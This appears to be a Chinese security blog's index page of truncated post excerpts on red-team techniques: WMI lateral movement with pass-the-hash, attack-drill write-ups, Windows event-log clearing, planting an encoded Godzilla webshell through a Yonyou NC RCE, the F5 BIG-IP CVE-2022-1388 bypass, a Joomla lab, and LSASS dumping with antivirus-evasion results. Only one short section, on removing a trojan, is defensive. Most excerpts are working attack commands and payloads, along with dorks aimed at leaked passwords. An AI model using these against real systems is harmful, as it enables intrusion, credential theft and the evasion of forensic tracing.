红队技术-各端口横向移动方法
135端口执行命令
12python wmiexec-pro.py administrator:Admin12345@192.168.186.136 exec-command -command "whoami" -with-outputpython wmiexec-pro.py -hashes :5571e12eef026de606df1ff9d4dab6f8 administrator@192.168.204.72 exec-command -command "whoami" -with-output
上传文件
1python wmiexec-pro.py administrator:Admin12345@192.168.186.136 filetransfer -upload -src-file "/root/Desktop/decode.exe" -dest-file "C:\users\public\test.exe"
wmiexec12python wmiexec.py -hashes : ...
渗透测试-soapUI调试webservice
渗透测试过程中,可能会碰到以wsdl结尾的站点
这时候可以通过soapUI进行测试会比较方便
https://github.com/SmartBear/soapui
下载完成后,点击soapui.bat运行程序,直接点击jar包运行会报错
1、新建一个project
2、add wsdl
3、填入地址
4、发送payload进行测试
攻防演练-某市级教育厅HW复盘总结
前言正如今年的高考题目,学习应从本手开始,把基础打好,才能在实战中打出妙手操作,如果眼高手低,往往会落到俗手的下场
这次攻防演练每个队伍分配不同的目标,有些队伍拿的点可以直接nday打,有些队伍外网打点十分困难比如我们,但分数是是统一算的,可以说不是那么的公平
不过也算是提供了些许经验,简单做一下总结,都是比较基础的东西,如有写的不正确的地方欢迎各位师傅指正
外网打点敏感信息泄露一般来说学校外网能拿直接权限的点已经很少了,web应用大多是放在vpn后面,因此能弄到一个vpn账号可以说是事半功倍
另外还可以通过语法筛选出存在默认弱口令的系统,常用命令如下:
1234567#google语法site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码#github*.edu.cn password查看方式优先选择最近更新,太久远的基本上失效了
这里队友收集到了某个目标的vpn账号,使用的是 姓名拼音/12345678 弱口令
进去内网后能访问的只有一个OA系统,测试了一下没发现什么东西,寻找其他突破口
shiro无链常规的打点可通过fofa、hu ...
攻防演练-某集团红队检测
外网打点资产识别使用Ehole快速识别重点资产
链接:https://github.com/EdgeSecurityTeam/EHole
1Ehole.exe -fofa 检测的域名
寻找口子1、每个网站可以尝试默认密码或’admin’、1qazxsw2====等类似弱口令
这里通过sysadmin/1 成功登入泛微后台
2、接着浏览其他站点,这里运气比较好发现了用友的nday
3、访问接口/servlet/~ic/bsh.servlet.BshServlet执行命令
4、另外还存在用友nc任意文件上传漏洞,直接上哥斯拉
内网渗透杀软识别1tasklist /svc
把之前准备好的bypass360马子扔上去,成功上线
隧道搭建ping了一下发现机器出网,可以上frp搭建反向代理隧道
proxifier配置相应的端口账密便可以进入内网
由于周六日没人防守,直接上fscan对各个C段开扫,发现网段里的弱口令或web漏洞,帮助我们拿下机器进一步横向,拿到机器后先做信息搜集,网段,机器信息,敏感文件,xshell、n ...
痕迹清除-Windows日志清除绕过
windows日志清除目录在我们日常的安全攻击过程中,登录尝试、流程开发、其他用户和设备行为都记录在 Windows 事件日志中,这将会增大自身被溯源的风险,针对于windows日志痕迹清除主要总结了以下这些方法
关闭日志服务12345#找出日志进程的PIDGet-WmiObject -Class win32_service -Filter "name = 'eventlog'" #kill掉对应PIDtaskkill /F /PID 1792
重启可进行恢复
wevtutil它是一个系统工具,可让您查找有关事件日志和发布者的详细信息。您还可以使用此命令安装和卸载事件清单、导出、存档和清除日志。
12统计日志列表,查询所有日志信息,包含时间,数目wevtutil.exe gli Application
12查看指定类别的日志内容wevtutil qe /f:text Application
12删除该类日志所有内容wevtutil cl Application
但清除完会留下1012或104的系统日志
12获取最近十 ...
红队技术-用友nc写shell方法
平常遇到用友nc rce可以通过exec进行命令执行,但在不出网的场景下则需要其他方法
首先生成一个哥斯拉的jsp木马,然后进行unicode编码
再把输出结果进行url编码
最后发送数据包如下
1234String keyWord = URLDecoder.decode("%3c%25%21%5c%75%30%30%32%30%5c%75%30%30%35%33%5c%75%30%30%37%34%5c%75%30%30%37%32%5c%75%30%30%36%39%5c%75%30%30%36%65%5c%75%30%30%36%37%5c%75%30%30%32%30%5c%75%30%30%37%38%5c%75%30%30%36%33%5c%75%30%30%33%64%5c%75%30%30%32%32%5c%75%30%30%33%33%5c%75%30%30%36%33%5c%75%30%30%33%36%5c%75%30%30%36%35%5c%75%30%30%33%30%5c%75%30%30%36%32%5c%75%30%30%33%38%5c ...
漏洞复现-CVE-2022-1388 F5 BIG-IP RCE
漏洞原理hop-by-hop 逐跳,当在请求中遇到这些header头,逐跳会进行处理不让其转发至下一跳,比如Connection: close,abc在传输过程中,会把abc会从原始请求中删除,可以利用此特性进行SSRF、绕过鉴权等操作,本次漏洞成因就是Connection: Keep-alive,X-F5-Auth-Token,BIG-IP的鉴权过程发生在frontend,在后续转发到Jetty时会将此header删除,从而绕过鉴权
1234POST /xxx HTTP/1.1Host: Connection: close,abcabc:
处理后变成
123POST /xxx HTTP/1.1Host: Connection: close
影响版本123456- BIG-IP versions 16.1.0 to 16.1.2 (Patch released)- BIG-IP versions 15.1.0 to 15.1.5 (Patch released)- BIG-IP versions 14.1.0 to 14.1.4 (Patch released)- BIG-IP v ...
靶场学习-从joomla到拿下域控
访问网站主页,是一个博客网站
常规的目录扫描
这里发现一个疑似后台地址,访问http://192.168.2.252/administrator/
为 joomla 站点,印象中记得有rce的漏洞,上网寻找相关脚本进行利用
正当我以为一键getshell后,发现并没有利用成功
继续寻找其他利用点,这里通过 configuration.php~找到一个数据库的文件
1mysql数据库 testuser/cvcvgjASD!@
使用navicat进行连接,可看到这里的密码为bcrypt加密,这个是不可逆的,一般是通过重新生成hash进行替换
重新生成一个hash发现还是登陆不上
这时候去阅读joomla的官方文档,寻找重置密码的方式
1secret = d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199
这里把密码重置为secret,重置后可以成功登录
找到 template 模块进行 webshell 文件上传
哥斯拉成功连接
连接之后发现很多命令执行不了
这里使用哥斯拉自带的 ...
免杀技术-dump lsass实测
DumpMinitool.exe经测试,360和卡巴拦截,火绒正常
Visual Studio 2022 的一个程序,使用这个需要安装扩展开发
1C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions\DumpMinitool.exe
使用命令
12345DumpMinitool.exe --file c:\users\public\test.txt --processId PID --dumpType Full# 读取pip install pypykatzpypykatz lsa minidump 111.txt
360拦截
卡巴斯基拦截
火绒不拦截
dump64.exe卡巴斯基拦截,火绒和360不拦截
360不拦截
火绒不拦截
应急响应-紫狐木马处置
特征确认1、cpu占用率较高
2、netstat -ano 查看有大量的对外1433不明连接
3、输入fltmc发现存在dump_xx过滤器,为紫狐木马病毒特征(管理员权限)
处置方式使用everything检索ms*.dll筛选出恶意dll
到相应的目录下无法直接查看
通过注册表找到恶意键值进行删除
删除后进行重启,重启后到C:\Windows\System32目录下可发现恶意的dll文件
恢复确认cmd输入fltmc查看恢复正常
Cpu占用率变低
没有了恶意外连










